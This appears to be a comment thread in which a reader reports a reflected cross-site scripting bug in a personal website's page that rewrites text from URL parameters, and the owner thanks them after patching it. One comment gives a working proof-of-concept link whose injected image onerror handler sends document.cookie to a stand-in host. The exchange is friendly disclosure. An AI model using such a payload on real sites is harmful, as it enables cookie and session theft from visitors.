I think that's a little bit dramatic. For a start I don't think there's anything people could get their hands on -- as far as I'm aware there are no cookies on my site. The only dynamic content at all is from that wee Twitter iframe. If you have a proof of concept attack, I'd love to see it -- and to think about a solution. Are you talking about the risk of someone injecting JS code into the website via a link and inducing me to click on it? I could update the JS to escape the URL parameters before performing the replace..
Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny. POC: https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E Html encoding the string before doing the replacement should fix it if you can be bothered. Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.
Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"